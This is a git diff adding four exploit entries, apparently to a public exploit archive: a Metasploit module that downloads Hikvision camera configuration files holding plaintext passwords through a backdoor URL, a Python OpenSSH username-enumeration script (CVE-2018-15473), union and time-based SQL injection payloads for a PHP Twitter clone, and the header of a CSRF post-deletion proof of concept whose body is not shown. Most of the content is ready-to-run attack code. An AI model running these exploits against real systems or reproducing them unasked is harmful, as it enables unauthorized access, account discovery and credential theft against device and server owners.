diff --git a/exploits/hardware/webapps/45231.rb b/exploits/hardware/webapps/45231.rb new file mode 100755 index 000000000..a8e43ec7f --- /dev/null +++ b/exploits/hardware/webapps/45231.rb @@ -0,0 +1,77 @@ +# Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit) +# Author: Alfie +# Date: 2018-08-21 +# Website: https://www.hikvision.com/en/ +# Software: Hikvision Camera +# Versions: +# DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530 +# DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401 +# DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125 +# DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414 +# DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421 +# DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928 +# DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106 + +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Configuration download in Hikvision IP Cameras', + 'Description' => %q{ + Many Hikvision IP cameras contain a backdoor that allows unauthenticated impersonation of any configured user account. The vulnerability has been present in Hikvision products since at least 2014. In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names. Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing. In addition to gaining full administrative access, the vulnerability can be used to retrieve plain-text passwords for all configured users. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Monte Crypto', # Vulnerability discovery + 'Alfie Njeru' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html' ], + + [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ] + ] + )) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'Path to the path that config is stored ', '/System/configurationFile?auth=YWRtaW46MTEK']) + ]) + end + + def run_host(ip) + + print_status("#{rhost}:#{rport} - Sending request...") + uri = normalize_uri(target_uri.path) + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + }) + + if res and res.code == 200 + contents = res.body + fname = File.basename(datastore['TARGETURI']) + path = store_loot( + 'usersvision ', + 'text/plain', + ip, + contents, + fname + ) + print_status("#{rhost}:#{rport} - File saved in: #{path}") + else + print_error("#{rhost}:#{rport} - Failed to retrieve file") + return + end + end +end \ No newline at end of file diff --git a/exploits/linux/remote/45233.py b/exploits/linux/remote/45233.py new file mode 100755 index 000000000..3c705883c --- /dev/null +++ b/exploits/linux/remote/45233.py @@ -0,0 +1,165 @@ +# Exploit: OpenSSH 7.7 - Username Enumeration +# Author: Justin Gardner +# Date: 2018-08-20 +# Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz +# Affected Versions: OpenSSH version < 7.7 +# CVE: CVE-2018-15473 + +########################################################################### +# ____ _____ _____ _ _ # +# / __ \ / ____/ ____| | | | # +# | | | |_ __ ___ _ __ | (___| (___ | |__| | # +# | | | | '_ \ / _ \ '_ \ \___ \\___ \| __ | # +# | |__| | |_) | __/ | | |____) |___) | | | | # +# \____/| .__/ \___|_| |_|_____/_____/|_| |_| # +# | | Username Enumeration # +# |_| # +# # +########################################################################### + +#!/usr/bin/env python + +import argparse +import logging +import paramiko +import multiprocessing +import socket +import sys +import json +# store function we will overwrite to malform the packet +old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] + +# create custom exception +class BadUsername(Exception): + def __init__(self): + pass + +# create malicious "add_boolean" function to malform packet +def add_boolean(*args, **kwargs): + pass + +# create function to call when username was invalid +def call_error(*args, **kwargs): + raise BadUsername() + +# create the malicious function to overwrite MSG_SERVICE_ACCEPT handler +def malform_packet(*args, **kwargs): + old_add_boolean = paramiko.message.Message.add_boolean + paramiko.message.Message.add_boolean = add_boolean + result = old_parse_service_accept(*args, **kwargs) + #return old add_boolean function so start_client will work again + paramiko.message.Message.add_boolean = old_add_boolean + return result + +# create function to perform authentication with malformed packet and desired username +def checkUsername(username, tried=0): + sock = socket.socket() + sock.connect((args.hostname, args.port)) + # instantiate transport + transport = paramiko.transport.Transport(sock) + try: + transport.start_client() + except paramiko.ssh_exception.SSHException: + # server was likely flooded, retry up to 3 times + transport.close() + if tried < 4: + tried += 1 + return checkUsername(username, tried) + else: + print '[-] Failed to negotiate SSH transport' + try: + transport.auth_publickey(username, paramiko.RSAKey.generate(1024)) + except BadUsername: + return (username, False) + except paramiko.ssh_exception.AuthenticationException: + return (username, True) + #Successful auth(?) + raise Exception("There was an error. Is this the correct version of OpenSSH?") + +def exportJSON(results): + data = {"Valid":[], "Invalid":[]} + for result in results: + if result[1] and result[0] not in data['Valid']: + data['Valid'].append(result[0]) + elif not result[1] and result[0] not in data['Invalid']: + data['Invalid'].append(result[0]) + return json.dumps(data) + +def exportCSV(results): + final = "Username, Valid\n" + for result in results: + final += result[0]+", "+str(result[1])+"\n" + return final + +def exportList(results): + final = "" + for result in results: + if result[1]: + final+=result[0]+" is a valid user!\n" + else: + final+=result[0]+" is not a valid user!\n" + return final + +# assign functions to respective handlers +paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet +paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error + +# get rid of paramiko logging +logging.getLogger('paramiko.transport').addHandler(logging.NullHandler()) + +arg_parser = argparse.ArgumentParser() +arg_parser.add_argument('hostname', type=str, help="The target hostname or ip address") +arg_parser.add_argument('--port', type=int, default=22, help="The target port") +arg_parser.add_argument('--threads', type=int, default=5, help="The number of threads to be used") +arg_parser.add_argument('--outputFile', type=str, help="The output file location") +arg_parser.add_argument('--outputFormat', choices=['list', 'json', 'csv'], default='list', type=str, help="The output file location") +group = arg_parser.add_mutually_exclusive_group(required=True) +group.add_argument('--username', type=str, help="The single username to validate") +group.add_argument('--userList', type=str, help="The list of usernames (one per line) to enumerate through") +args = arg_parser.parse_args() + +sock = socket.socket() +try: + sock.connect((args.hostname, args.port)) + sock.close() +except socket.error: + print '[-] Connecting to host failed. Please check the specified host and port.' + sys.exit(1) + +if args.username: #single username passed in + result = checkUsername(args.username) + if result[1]: + print result[0]+" is a valid user!" + else: + print result[0]+" is not a valid user!" +elif args.userList: #username list passed in + try: + f = open(args.userList) + except IOError: + print "[-] File doesn't exist or is unreadable." + sys.exit(3) + usernames = map(str.strip, f.readlines()) + f.close() + # map usernames to their respective threads + pool = multiprocessing.Pool(args.threads) + results = pool.map(checkUsername, usernames) + try: + outputFile = open(args.outputFile, "w") + except IOError: + print "[-] Cannot write to outputFile." + sys.exit(5) + if args.outputFormat=='list': + outputFile.writelines(exportList(results)) + print "[+] Results successfully written to " + args.outputFile + " in List form." + elif args.outputFormat=='json': + outputFile.writelines(exportJSON(results)) + print "[+] Results successfully written to " + args.outputFile + " in JSON form." + elif args.outputFormat=='csv': + outputFile.writelines(exportCSV(results)) + print "[+] Results successfully written to " + args.outputFile + " in CSV form." + else: + print "".join(results) + outputFile.close() +else: # no usernames passed in + print "[-] No usernames provided to check" + sys.exit(4) \ No newline at end of file diff --git a/exploits/php/webapps/45230.txt b/exploits/php/webapps/45230.txt new file mode 100644 index 000000000..dffd34181 --- /dev/null +++ b/exploits/php/webapps/45230.txt @@ -0,0 +1,51 @@ +# Exploit Title: Twitter-Clone 1 - 'userid' SQL Injection +# Date: 2018-08-21 +# Exploit Author: L0RD +# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ +# Version: 1 +# CVE: N/A +# Tested on: Win 10 + +# POC : SQLi +# vulnerable files : follow.php , index.php +# vulnerable parameters : userid , username + +# 1) follow.php : + +# Parameters : userid , username +# Type : Union query +# Type : Time-based blind +# Payloads : + +userid: ' UNION SELECT 1,2,user(),4,database(),6,7%23 +username: ' AND sleep(10)%23 + +# vulnerable code : + +if($_GET['userid'] && $_GET['username']){ +if($_GET['userid']!=$user_id){ +$follow_userid = $_GET['userid']; +$follow_username = $_GET['username']; +include 'connect.php'; +$query = mysqli_query($con, "SELECT id + FROM following +WHERE user1_id='$user_id' AND user2_id='$follow_userid' +"); + +# 2) index.php : + +# vulnerable parameter : username +# Type : Union query +# Payload : + +' union select 1,2,user(),4,5,6 + +# vulnerable code : + +if($_POST['login-btn']=="login-submit"){ +if($_POST['username'] != "" && $_POST['password'] != ""){ +$username = strtolower($_POST['username']); +include "connect.php"; +$query = mysqli_query($con, "SELECT id, password +FROM users + WHERE username='$username'"); \ No newline at end of file diff --git a/exploits/php/webapps/45232.txt b/exploits/php/webapps/45232.txt new file mode 100644 index 000000000..9e64220f0 --- /dev/null +++ b/exploits/php/webapps/45232.txt @@ -0,0 +1,29 @@ +# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post) +# Date: 2018-08-21 +# Exploit Author: L0RD +# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ +# Version: 1 +# CVE: N/A +# Tested on: Win 10 + +# Description : +# An issue was discovered in Twitter-Clone 1 which allows a remote +# attacker to force any victim to delete posts. + +# POC : +# Delete posts exploit : + + +
+